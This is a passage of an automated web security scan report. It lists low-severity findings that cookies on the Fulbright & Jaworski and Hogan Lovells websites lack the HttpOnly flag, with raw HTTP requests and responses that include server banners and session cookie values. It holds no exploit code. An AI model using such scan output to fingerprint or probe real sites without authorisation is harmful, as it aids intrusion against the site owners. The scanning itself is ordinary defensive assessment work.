The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

10.79. http://www.hoganlovells.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 98842
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Content-Length: 98842


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.80. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/Online_Client_Service/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1221; path=/
Set-Cookie: PortletId=1295002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.81. http://www.hoganlovells.com/FCWSite/HoganHartsonWS/HHWebServices.asmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/HoganHartsonWS/HHWebServices.asmx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /FCWSite/HoganHartsonWS/HHWebServices.asmx?op=GetEventCalendarDates HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hoganlovells.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 444

<soap:Envelope xmlns:xsi=%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22+xmlns%3asoap%3d%22http%3a%2f%2fschemas.xmlsoap.org%2fs
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 19 Jan 2011 15:18:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 537
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSch
...[SNIP]...

10.82. http://www.hoganlovells.com/FCWSite/Include/AttorneyTypeAhead.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/AttorneyTypeAhead.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/AttorneyTypeAhead.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 10302
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:22 GMT
Accept-Ranges: bytes
ETag: "c4dfe5b71edcca1:1019"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:42 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

...var enterKeyButtonSearch = "";
var typeAheadParentID = "";
var typeAheadList = "#nameTypeAhead";
var AttorneyTypeAheadWS = "/FCWSite/HoganHartsonWS/HHWebServices.asmx";
var disableTypeAheadBlur
...[SNIP]...

10.83. http://www.hoganlovells.com/FCWSite/Include/careers.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/careers.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/careers.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 5938
Content-Type: text/css
Last-Modified: Mon, 29 Nov 2010 18:02:49 GMT
Accept-Ranges: bytes
ETag: "781659a2ef8fcb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:04 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 5938

#subnav                {/*background-color:#7E383D;background-color:#cbd401;*/color:#181820;font:11px/12px Arial;text-transform:uppercase;text-align:center;}
#subnav .padding    {padding:5px 0 7px 0;}                    
#subnav
...[SNIP]...

10.84. http://www.hoganlovells.com/FCWSite/Include/incFlashDetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/incFlashDetect.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/incFlashDetect.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 7915
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:22 GMT
Accept-Ranges: bytes
ETag: "f1b51cb81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:19 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


/*
Plugin Detector()

Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)

Author: Nadav Savio
Author Email: webmonkey@giantant.com

*/

window.one
...[SNIP]...

10.85. http://www.hoganlovells.com/FCWSite/Include/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/jquery-1.3.2.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 57272
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Oct 2010 15:20:40 GMT
Accept-Ranges: bytes
ETag: "c29ab7333366cb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:53 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date:
...[SNIP]...

10.86. http://www.hoganlovells.com/FCWSite/Include/jquery-ui-1.7.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/jquery-ui-1.7.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/jquery-ui-1.7.2.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 32683
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:22 GMT
Accept-Ranges: bytes
ETag: "a77a21b81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:34 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

/*
* jQuery UI 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.
...[SNIP]...

10.87. http://www.hoganlovells.com/FCWSite/Include/jquery-ui-datepicker.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/jquery-ui-datepicker.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/jquery-ui-datepicker.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 44976
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:22 GMT
Accept-Ranges: bytes
ETag: "a77a21b81edcca1:1019"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:38 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

/*
* jQuery UI Datepicker 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* h
...[SNIP]...

10.88. http://www.hoganlovells.com/FCWSite/Include/menu/fr/mouseover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/menu/fr/mouseover.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/menu/fr/mouseover.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 3404
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "b8a128b81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:30 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<!-- Hide from old browsers


// French
aboutonfr = new Image();
aboutonfr.src = imageRoot + "/fr/nav/lo_about.gif";
aboutofffr = new Image();
aboutofffr.src = imageRoot + "/fr/nav/l_about.gi
...[SNIP]...

10.89. http://www.hoganlovells.com/FCWSite/Include/menu/ja/mouseover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/menu/ja/mouseover.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/menu/ja/mouseover.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 3402
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "1342bb81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:19 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<!-- Hide from old browsers


// Japanese
aboutonja = new Image();
aboutonja.src = imageRoot + "/ja/nav/lo_about.gif";
aboutoffja = new Image();
aboutoffja.src = imageRoot + "/ja/nav/l_about.
...[SNIP]...

10.90. http://www.hoganlovells.com/FCWSite/Include/menu/mouseover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/menu/mouseover.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/menu/mouseover.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 1458
Content-Type: application/x-javascript
Last-Modified: Fri, 01 Oct 2010 19:21:28 GMT
Accept-Ranges: bytes
ETag: "bb80e0d89d61cb1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:54 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<!-- Hide from old browsers

// FUNCTIONS
function lo(imgName) {
   imgon = eval(imgName + "on.src");
   document [imgName].src = imgon;
}

function l(imgName) {
   imgoff = eval(imgName + "off.src
...[SNIP]...

10.91. http://www.hoganlovells.com/FCWSite/Include/menu/zh/mouseover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/menu/zh/mouseover.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/menu/zh/mouseover.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 3405
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "c9c82fb81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:04 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<!-- Hide from old browsers


// Chinese
aboutonzh = new Image();
aboutonzh.src = imageRoot + "/zh/nav/lo_about.gif";
aboutoffzh = new Image();
aboutoffzh.src = imageRoot + "/zh/nav/l_about.g
...[SNIP]...

10.92. http://www.hoganlovells.com/FCWSite/Include/merger/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/merger/AC_RunActiveContent.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/merger/AC_RunActiveContent.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 8321
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "c9c82fb81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:52 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") !=
...[SNIP]...

10.93. http://www.hoganlovells.com/FCWSite/Include/merger/BrowserSpecifics.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/merger/BrowserSpecifics.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/merger/BrowserSpecifics.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 2272
Content-Type: application/x-javascript
Last-Modified: Wed, 14 Apr 2010 22:06:23 GMT
Accept-Ranges: bytes
ETag: "242b32b81edcca1:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:17:54 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

...// Styles for browser specific versions.
document.writeln("<style type=\"text/css\">");
// Not IE Browsers
if (!$.browser.msie) {
document.writeln("body .header .topnav ul li.on {background
...[SNIP]...

10.94. http://www.hoganlovells.com/FCWSite/Include/merger/general.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Include/merger/general.css

Issue detail

